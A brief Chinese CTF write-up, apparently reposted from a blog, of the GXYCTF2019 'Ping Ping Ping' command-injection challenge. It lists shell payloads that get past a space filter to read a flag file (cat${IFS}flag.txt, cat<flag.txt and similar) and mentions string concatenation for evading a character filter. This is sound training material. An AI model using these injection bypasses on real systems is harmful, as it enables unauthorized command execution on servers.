其他分享
首页 > 其他分享> > [GXYCTF2019]Ping Ping Ping

[GXYCTF2019]Ping Ping Ping

作者:互联网

打开网站

image

测试漏洞:RCE
image

使用ls获得flag.php
image

使用cat flag.php 空格被过滤

image

绕过空格过滤

cat flag.txt
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt

image

绕过字符过滤

使用字符拼接
image

标签:IFS,Ping,cat,flag,过滤,txt,GXYCTF2019
来源: https://www.cnblogs.com/oldliutou/p/15687292.html